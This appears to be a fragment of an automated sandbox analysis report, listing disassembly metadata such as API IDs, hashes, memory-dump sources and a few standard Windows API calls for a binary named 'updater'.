                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Mpunct
                                  • String ID: $+xv
                                  • API String ID: 4240859931-1686923651
                                  • Opcode ID: b70f5c69d82d715e228f96f831b1266a2962eec9ac645a907e563a80474d2787
                                  • Instruction ID: 641d8221da2dbef8c85a254d888a84c3414cb082603c6ea21dc7d3445b42f3cb
                                  • Opcode Fuzzy Hash: b70f5c69d82d715e228f96f831b1266a2962eec9ac645a907e563a80474d2787
                                  • Instruction Fuzzy Hash: C521B2B1904B926FD722DF758890B7BBFE8BB28200F14095FE599C7A50D334E641CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: H_prolog3_
                                  • String ID: false$true
                                  • API String ID: 2427045233-2658103896
                                  • Opcode ID: f0198abfedd2e00e872bd2c6f9b65c406ba7392264e178cef9ee3391979c1ac9
                                  • Instruction ID: c0d77076e9e0057fdb2e728f8ede6949cb1e97da8ed4dc886091c835babd0ae2
                                  • Opcode Fuzzy Hash: f0198abfedd2e00e872bd2c6f9b65c406ba7392264e178cef9ee3391979c1ac9
                                  • Instruction Fuzzy Hash: 9711D3B1D407469FC722EFB6D401B8ABBF4AF25200F14852FE5A68B6A0EB70E545CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _strlen
                                  • String ID: %!.15g$%lld
                                  • API String ID: 4218353326-2983862324
                                  • Opcode ID: 18d02f223b3c8aff2026b64ec029702f65c62cc1ec10fafa0fa6859e76463abe
                                  • Instruction ID: fac9e9408fae41ae8f84a2bbea88a011a00da8eea580c041a6e9e49e0d0bcc49
                                  • Opcode Fuzzy Hash: 18d02f223b3c8aff2026b64ec029702f65c62cc1ec10fafa0fa6859e76463abe
                                  • Instruction Fuzzy Hash: 57F07872604B046AD3305F9E9C05A27BBF8DF99B04F00071EF5CA92582DAB0A94487E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 013C4317: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014606B0,013DF491,?,013DE301,80070057,?,013DF491,00000001), ref: 013C431D
                                    • Part of subcall function 013C4317: GetLastError.KERNEL32(?,00000000,00000000,00000000,8007000E,?,?,?,014606B0,013DF491,?,013DE301,80070057,?,013DF491,00000001), ref: 013C4327
                                  • IsDebuggerPresent.KERNEL32(?,?,?,013C1130), ref: 0141D974
                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,013C1130), ref: 0141D983
                                  Strings
                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0141D97E
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                  • API String ID: 3511171328-631824599
                                  • Opcode ID: 6914dac0daa9f42bc0b5fe6a0a58c211be864cceb5be73c4f64b8af3d76c7510
                                  • Instruction ID: 4cc7b97107cb3f7ad48035241dbb03a33f2edcc6bb668c2313b28245de086e59
                                  • Opcode Fuzzy Hash: 6914dac0daa9f42bc0b5fe6a0a58c211be864cceb5be73c4f64b8af3d76c7510
                                  • Instruction Fuzzy Hash: 60E092B86003518BE734DF69D5083467BE6AF00709F00881ED4A5C3728D7B0D448CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%